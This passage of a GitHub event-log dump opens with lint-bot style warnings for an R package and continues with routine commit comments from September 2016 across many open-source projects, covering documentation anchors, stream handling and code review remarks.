~^~\n```\n[R/ABC_SMC.R:252:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L252) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:252:19:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                  ^~~~~~~~\n```\n[R/ABC_SMC.R:252:35:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:252:51:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:253:9:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:253:32:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L253) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:253:37:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                                    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:256:5:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L256) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n    ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:256:26:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L256) *style:* **Commas should always have a space after.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^\n```\n[R/ABC_SMC.R:256:26:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L256) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:257:5:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:257:19:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:258:5:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:258:19:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:259:5:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L259) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:259:19:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L259) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:266:13:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L266) *style:* **Put spaces around all infix operators.**\n```r\n​\t  d <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\",\n           ~^~~\n```\n[R/ABC_SMC.R:266:51:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L266) *style:* **Put spaces around all infix operators.**\n```r\n​\t  d <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\",\n                                                 ~^~\n```\n[R/ABC_SMC.R:267:42:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L267) *style:* **Put spaces around all infix operators.**\n```r\n​\t                        collapse = NULL), header = F)\n                                        ~^\n```\n[R/ABC_SMC.R:270:21:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L270) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                   ~^~~\n```\n[R/ABC_SMC.R:270:59:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L270) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                         ~^~\n```\n[R/ABC_SMC.R:271:50:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L271) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t                        collapse = NULL), header = F)\n                                                ~^\n```\n[R/ABC_SMC.R:273:21:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L273) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n                   ~^~~\n```\n[R/ABC_SMC.R:274:50:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/ABC_SMC.R#L274) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t                        collapse = NULL), header = F)\n                                                ~^\n```\n[R/generateArtificialData.R:3:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(numSpecies, numTraits, numCommunities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:4:38:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L4) *style:* **Variable and function names should be all lowercase.**\n```r\n​generate.Artificial.Data <- function(numSpecies, numTraits, numCommunities,\n                                     ^~~~~~~~~~\n```\n[R/generateArtificialData.R:4:50:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L4) *style:* **Variable and function names should be all lowercase.**\n```r\n​generate.Artificial.Data <- function(numSpecies, numTraits, numCommunities,\n                                                 ^~~~~~~~~\n```\n[R/generateArtificialData.R:4:61:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L4) *style:* **Variable and function names should be all lowercase.**\n```r\n​generate.Artificial.Data <- function(numSpecies, numTraits, numCommunities,\n                                                            ^~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:5:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- numSpecies\n^\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tn_traits <- numTraits;\n^\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L6) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[R/generateArtificialData.R:7:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tn_communities <- numCommunities\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tmechanism_random <- random.Mechanism;\t\n^\n```\n[R/generateArtificialData.R:8:23:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- numSpecies\n                     ~^~~\n```\n[R/generateArtificialData.R:8:26:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L8) *style:* **Variable and function names should be all lowercase.**\n```r\n​\tpool_richness <- numSpecies\n                         ^~~~~~~~~~\n```\n[R/generateArtificialData.R:8:39:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tmechanism_random <- random.Mechanism;\t\n                                      ^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[R/generateArtificialData.R:9:18:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tn_traits <- numTraits;\n                ~^~~\n```\n[R/generateArtificialData.R:9:21:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L9) *style:* **Variable and function names should be all lowercase.**\n```r\n​\tn_traits <- numTraits;\n                    ^~~~~~~~~\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix(round(rnorm(n = (pool_richness * n_traits), mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:10:23:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​\tn_communities <- numCommunities\n                     ~^~~\n```\n[R/generateArtificialData.R:10:26:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L10) *style:* **Variable and function names should be all lowercase.**\n```r\n​\tn_communities <- numCommunities\n                         ^~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:11:26:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\tmechanism_random <- random.Mechanism;\t\n                        ~^~~\n```\n[R/generateArtificialData.R:11:39:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L11) *style:* **Trailing whitespace is superfluous.**\n```r\n​\tmechanism_random <- random.Mechanism;\t\n                                      ^\n```\n[R/generateArtificialData.R:12:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L12) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumn1 <- c()\n^\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L13) *style:* **lines should not be more than 80 characters.**\n```r\n​\ttraits_pool <- matrix(round(rnorm(n = (pool_richness * n_traits), mean = 0, sd = 1), 3),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:13:21:](https://github.com/thijsjanzen/STEPCAM/blob/23fca3a12c6976cc5d84be35f8cf8869ffa3e8b9/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix(round(rnorm(n = (pool_richness * n_traits), mean = 0, sd = 1), 3),\n                   ~^~~\n```\n"}},"created_at":"2016-09-18T15:42:49Z"}
{"id":"4580129662","type":"CommitCommentEvent","actor":{"login":"matthewwall"},"repo":{"name":"weewx/weewx"},"payload":{"comment":{"id":19071105,"position":8,"line":4905,"path":"docs/customizing.htm","commit_id":"30d909d63cb249857305070530af772106b947c2","created_at":"2016-09-18T15:43:11Z","updated_at":"2016-09-18T15:43:11Z","body":"\nOn 18 Sep 2016, at 11:30, Tom Keffer wrote:\n\n> They are redundant, but those are the id's used in the original docs in customizing.htm, and I didn't want to change them.\n\nthe 3.5.0 and earlier docs did not have a utilities.htm\n\ncustomizing.htm had no references to #*_utility before we added utilities.htm - it had only one reference, and that was #wee_reports\n\nso we should be able to do the #name identifiers right without breaking previous links"}},"created_at":"2016-09-18T15:43:11Z"}
{"id":"4580132003","type":"CommitCommentEvent","actor":{"login":"JoshRosen"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19071107,"position":163,"line":811,"path":"core/src/main/scala/org/apache/spark/storage/memory/MemoryStore.scala","commit_id":"8faa5217b44e8d52eab7eb2d53d0652abaaf43cd","created_at":"2016-09-18T15:44:40Z","updated_at":"2016-09-18T15:44:40Z","body":"This `finishWritingToStream` method will call `serializationStream.close()` at the end of the method, which calls `RedirectableOutputStream.close()`, which will end up closing the `fileOutputStream` passed in here."}},"created_at":"2016-09-18T15:44:40Z"}
{"id":"4580136468","type":"CommitCommentEvent","actor":{"login":"andersburla"},"repo":{"name":"TeaCommerce/Payment-providers"},"payload":{"comment":{"id":19071109,"position":null,"line":null,"path":null,"commit_id":"6979cacc9d059273a4d05ae09b9f659d0e53c003","created_at":"2016-09-18T15:47:17Z","updated_at":"2016-09-18T15:47:17Z","body":"Great pull request. Could you have the same code styling so its easy to see what has changed and do the pull? :)"}},"created_at":"2016-09-18T15:47:17Z"}
{"id":"4580136658","type":"CommitCommentEvent","actor":{"login":"tkeffer"},"repo":{"name":"weewx/weewx"},"payload":{"comment":{"id":19071110,"position":8,"line":4905,"path":"docs/customizing.htm","commit_id":"30d909d63cb249857305070530af772106b947c2","created_at":"2016-09-18T15:47:24Z","updated_at":"2016-09-18T15:47:24Z","body":"Unless there is a reference in the forums (which would be broken anyway). \r\n\r\nSpeaking of which, do you know a way to put a forwarding reference in `customizing.htm`? So, a reference to `customizing.htm#wee_database_utility` would be sent to `utilities.htm#wee_database_utility` (or, I suppose, `utilities.htm#wee_database`)?"}},"created_at":"2016-09-18T15:47:24Z"}
{"id":"4580138927","type":"CommitCommentEvent","actor":{"login":"Orbiter"},"repo":{"name":"yacy/yacy_search_server"},"payload":{"comment":{"id":19071113,"position":null,"line":null,"path":null,"commit_id":"bb8d03bdac82d22f88835838f9a7a5646cf1df3c","created_at":"2016-09-18T15:48:48Z","updated_at":"2016-09-18T15:48:48Z","body":"that ws true, but the release was added on july 16th"}},"created_at":"2016-09-18T15:48:48Z"}
{"id":"4580139463","type":"CommitCommentEvent","actor":{"login":"sdn1324"},"repo":{"name":"nealgosalia/HKSJ"},"payload":{"comment":{"id":19071115,"position":null,"line":null,"path":null,"commit_id":"d080568e4b42a53a8e24649f966cca91810e0151","created_at":"2016-09-18T15:49:08Z","updated_at":"2016-09-18T15:49:08Z","body":"\r\nlatest cve fix"}},"created_at":"2016-09-18T15:49:08Z"}
{"id":"4580140011","type":"CommitCommentEvent","actor":{"login":"sdn1324"},"repo":{"name":"nealgosalia/HKSJ"},"payload":{"comment":{"id":19071116,"position":null,"line":null,"path":null,"commit_id":"d080568e4b42a53a8e24649f966cca91810e0151","created_at":"2016-09-18T15:49:25Z","updated_at":"2016-09-18T15:49:25Z","body":"fuck \r\n"}},"created_at":"2016-09-18T15:49:25Z"}
{"id":"4580140507","type":"CommitCommentEvent","actor":{"login":"MartinBear"},"repo":{"name":"MartinBear/hello_world"},"payload":{"comment":{"id":19071118,"position":null,"line":null,"path":null,"commit_id":"b3567694428e9ae303530ea60d9638c13635c593","created_at":"2016-09-18T15:49:43Z","updated_at":"2016-09-18T15:49:43Z","body":"Ett svar från mig"}},"created_at":"2016-09-18T15:49:43Z"}
{"id":"4580141387","type":"CommitCommentEvent","actor":{"login":"dkochmanski"},"repo":{"name":"robert-strandh/McCLIM"},"payload":{"comment":{"id":19071120,"position":null,"line":null,"path":null,"commit_id":"02f777c0b62d84f13b70437bd3c9dd9a37b201d9","created_at":"2016-09-18T15:50:14Z","updated_at":"2016-09-18T15:50:14Z","body":"also as a bonus I want `text-style-to-X-font` to fallback to the ordinary xorg-fonts when this part of code fails. I haven't started that part yet though and I'm not sure how feasible this will be. So instead of missing-font error we will have ugly font. What do you think about this idea?"}},"created_at":"2016-09-18T15:50:14Z"}
{"id":"4580142396","type":"CommitCommentEvent","actor":{"login":"RyanTG"},"repo":{"name":"scottwainstock/pbm"},"payload":{"comment":{"id":19071121,"position":null,"line":null,"path":null,"commit_id":"a67fa09123d5c47b7409107732904e3e0db2460f","created_at":"2016-09-18T15:50:48Z","updated_at":"2016-09-18T15:50:48Z","body":"If not logged in, the link in the menu could go to a plain profile page that just says, \"you gotta login - or - search for a user\"\r\n\r\nAlso, now that there are user/11/profile pages, we can link to those pages on things like, \"updated on Sept-18-2016 by ssw\" with the \"ssw\" linking to the profile page.\r\n\r\nAlso note that travis is complaining about that commit I made above. Tests aren't breaking, per se, but there are warnings."}},"created_at":"2016-09-18T15:50:48Z"}
{"id":"4580143468","type":"CommitCommentEvent","actor":{"login":"ceoy"},"repo":{"name":"motivationsbanner/client"},"payload":{"comment":{"id":19071123,"position":null,"line":null,"path":null,"commit_id":"52d4ec04d5a30362a23dd756d1f7ba93a39f6630","created_at":"2016-09-18T15:51:31Z","updated_at":"2016-09-18T15:51:31Z","body":"<3"}},"created_at":"2016-09-18T15:51:31Z"}
{"id":"4580143526","type":"CommitCommentEvent","actor":{"login":"Li-Kezhi"},"repo":{"name":"JeffsanC/jeffsanc.github.io"},"payload":{"comment":{"id":19071124,"position":null,"line":null,"path":null,"commit_id":"7d6712efd434a3c8497d75abd37fbb920620fbd0","created_at":"2016-09-18T15:51:34Z","updated_at":"2016-09-18T15:51:34Z","body":"Your js should be put inside `<head></head>`."}},"created_at":"2016-09-18T15:51:34Z"}
{"id":"4580144423","type":"CommitCommentEvent","actor":{"login":"verdulife"},"repo":{"name":"verdulife/diy"},"payload":{"comment":{"id":19071127,"position":null,"line":null,"path":null,"commit_id":"1536fe3c3d0ef792c5238c832e2914023f28002e","created_at":"2016-09-18T15:52:11Z","updated_at":"2016-09-18T15:52:11Z","body":"initial commit"}},"created_at":"2016-09-18T15:52:11Z"}
{"id":"4580146523","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19071130,"position":null,"line":null,"path":null,"commit_id":"2d0e388d9ad348d1b9ca15e4e3ef63526d4c16a1","created_at":"2016-09-18T15:53:40Z","updated_at":"2016-09-18T15:53:40Z","body":"Also see [Issue 284: SunCC 12.2 - 12.5 and incorrect results for GCM when using SSE2 ASM](http://github.com/weidai11/cryptopp/issues/284)."}},"created_at":"2016-09-18T15:53:40Z"}
{"id":"4580149292","type":"CommitCommentEvent","actor":{"login":"ckaminer"},"repo":{"name":"ckaminer/scale_up"},"payload":{"comment":{"id":19071133,"position":5,"line":5,"path":"runner.py","commit_id":"339e1ac538c07f737177cf6c9dc763d6033f3613","created_at":"2016-09-18T15:55:32Z","updated_at":"2016-09-18T15:55:32Z","body":"Good idea.  I was hesitant to do this because of formatting but I can just include detailed instructions in the readme."}},"created_at":"2016-09-18T15:55:32Z"}
{"id":"4580149603","type":"CommitCommentEvent","actor":{"login":"matthewwall"},"repo":{"name":"weewx/weewx"},"payload":{"comment":{"id":19071134,"position":8,"line":4905,"path":"docs/customizing.htm","commit_id":"30d909d63cb249857305070530af772106b947c2","created_at":"2016-09-18T15:55:44Z","updated_at":"2016-09-18T15:55:44Z","body":"\nOn 18 Sep 2016, at 11:47, Tom Keffer wrote:\n\n> Speaking of which, do you know a way to put a forwarding reference in customizing.htm? So, a reference to customizing.htm#wee_database_utility would be sent to utilities.htm#wee_database_utility (or, I suppose, utilities.htm#wee_database)?\n\ni think the only options for redirect are in a web server.\n\nas for client-side, i can imagine doing it in javascript.  you could have a function that rewrites all of the name anchors and/or ids when the page has loaded.  or you could have a function that intercepts any link and rewrites when clicked on.  the former would probably be more robust.\n\n"}},"created_at":"2016-09-18T15:55:44Z"}
{"id":"4580152192","type":"CommitCommentEvent","actor":{"login":"pjangam"},"repo":{"name":"tavisca-smurkar/FlightBookingSystemWithTaskAndSupplierResponse"},"payload":{"comment":{"id":19071137,"position":21,"line":21,"path":"FlightServiceHost/FlightIISServices/FlightServices/FlightService.cs","commit_id":"ddfd24682f3863b9ed9ac548bf1da59511602de8","created_at":"2016-09-18T15:57:21Z","updated_at":"2016-09-18T15:57:21Z","body":"Breaking single responsibility principle.\r\nMaintaining mystifly file path, reading from that file should be responsibility of mystifly specific class and not service class."}},"created_at":"2016-09-18T15:57:21Z"}
{"id":"4580153759","type":"CommitCommentEvent","actor":{"login":"NickolasDePiton"},"repo":{"name":"NickolasDePiton/Stack"},"payload":{"comment":{"id":19071143,"position":null,"line":null,"path":null,"commit_id":"33adcdb065371d43bff0b746aee3b508f3195b17","created_at":"2016-09-18T15:58:28Z","updated_at":"2016-09-18T15:58:28Z","body":"Добавлено copy"}},"created_at":"2016-09-18T15:58:28Z"}
{"id":"4580156524","type":"CommitCommentEvent","actor":{"login":"bgK"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":19071148,"position":167,"line":2174,"path":"backends/graphics/surfacesdl/surfacesdl-graphics.cpp","commit_id":"05bc82b6225f79ad42e6259be8e227aed6e7c0dc","created_at":"2016-09-18T16:00:19Z","updated_at":"2016-09-18T16:00:19Z","body":"Removing the cloud thread was over-optimistic, but I was able to move the cloud icon handling out of the cloud thread. You should not hit that assert anymore."}},"created_at":"2016-09-18T16:00:19Z"}
{"id":"4580157799","type":"CommitCommentEvent","actor":{"login":"myexpr"},"repo":{"name":"GaneshArunagiri/NumberToTextTDDWay"},"payload":{"comment":{"id":19071151,"position":null,"line":null,"path":null,"commit_id":"5e370f441289467561e6dbb7dbd0fbdfb9b28503","created_at":"2016-09-18T16:01:02Z","updated_at":"2016-09-18T16:01:02Z","body":"Since ``Node`` is an independent class you will need a test case for it as well.. "}},"created_at":"2016-09-18T16:01:02Z"}
{"id":"4580157844","type":"CommitCommentEvent","actor":{"login":"koksiBG"},"repo":{"name":"koksiBG/test-repo"},"payload":{"comment":{"id":19071152,"position":null,"line":null,"path":null,"commit_id":"4c1bb5e61bf20550ea8416fc7c93a1154dab54f9","created_at":"2016-09-18T16:01:04Z","updated_at":"2016-09-18T16:01:04Z","body":"added two changes"}},"created_at":"2016-09-18T16:01:04Z"}
{"id":"4580165435","type":"CommitCommentEvent","actor":{"login":"vitalibassov"},"repo":{"name":"astserba/GitHub"},"payload":{"comment":{"id":19071178,"position":null,"line":null,"path":null,"commit_id":"ed0665dcdacfccf57601b46fa6dc874bafb87d1d","created_at":"2016-09-18T16:05:22Z","updated_at":"2016-09-18T16:05:22Z","body":"Ууууу Зибаляба ХММММ БУГФИКСЫ!!! ДРАТУТИ!"}},"created_at":"2016-09-18T16:05:22Z"}
{"id":"4580168005","type":"CommitCommentEvent","actor":{"login":"wangjiaqi"},"repo":{"name":"top-think/framework"},"payload":{"comment":{"id":19071182,"position":null,"line":null,"path":null,"commit_id":"677c4eb2fd283a17fde89ce22c7462b478c99642","created_at":"2016-09-18T16:07:01Z","updated_at":"2016-09-18T16:07:01Z","body":"这样就可以 `Db::connect()->getTables()` 获取所有表名了"}},"created_at":"2016-09-18T16:07:01Z"}
{"id":"4580169856","type":"CommitCommentEvent","actor":{"login":"fmrmx"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19071193,"position":null,"line":null,"path":null,"commit_id":"f07fe63e50062941dd99ce719f27f6d09ecfbd7d","created_at":"2016-09-18T16:08:17Z","updated_at":"2016-09-18T16:08:17Z","body":"If this commit crash world server when wintergrasp is turned on, i doesn't make sense"}},"created_at":"2016-09-18T16:08:17Z"}
{"id":"4580170592","type":"CommitCommentEvent","actor":{"login":"Chuck5ta"},"repo":{"name":"mangosthree/server"},"payload":{"comment":{"id":19071196,"position":null,"line":null,"path":null,"commit_id":"4dbe50a76db40c8e3b5caab232c9d517709db898","created_at":"2016-09-18T16:08:46Z","updated_at":"2016-09-18T16:08:46Z","body":"SD3 had duplicate declarations which had to be removed, therefore requiring this having to be done again for m3."}},"created_at":"2016-09-18T16:08:46Z"}
{"id":"4580170751","type":"CommitCommentEvent","actor":{"login":"dalta"},"repo":{"name":"dalta/angular2-playground"},"payload":{"comment":{"id":19071198,"position":17,"line":7,"path":"src/app/app.module.ts","commit_id":"2c1a213d0e0cb85fbdb5c1fc43c9f53685789f8d","created_at":"2016-09-18T16:08:53Z","updated_at":"2016-09-18T16:08:53Z","body":"I was unable to specify employee list component in the directives property of @Component of app. Adding it to declarations worked."}},"created_at":"2016-09-18T16:08:53Z"}
{"id":"4580171104","type":"CommitCommentEvent","actor":{"login":"dscharrer"},"repo":{"name":"dscharrer/void"},"payload":{"comment":{"id":19071200,"position":null,"line":null,"path":null,"commit_id":"4c7bd4decbe9db7265ec819f831f11561e1b5367","created_at":"2016-09-18T16:09:06Z","updated_at":"2016-09-18T16:09:06Z","body":"Neat. Great that you found it useful."}},"created_at":"2016-09-18T16:09:06Z"}
{"id":"4580172045","type":"CommitCommentEvent","actor":{"login":"vauxia"},"repo":{"name":"vauxia/django-cas-server"},"payload":{"comment":{"id":19071205,"position":51,"line":326,"path":"cas_server/auth.py","commit_id":"d3e7328348cf91cf399a54061581b4b355bac58a","created_at":"2016-09-18T16:09:47Z","updated_at":"2016-09-18T16:09:47Z","body":"Thanks for looking!\r\n\r\nI didn't want to reuse the existing conn because I was changing the DN that it was binding with, and I was afraid I would change usage/assumptions for other uses of that connection.\r\n\r\nI'm not sure there's a good reason to store or reuse the connection that the user did its bind with. Maybe it's OK to reuse conn after all, or maybe I should just close my connection?\r\n\r\nOpen to ideas."}},"created_at":"2016-09-18T16:09:47Z"}
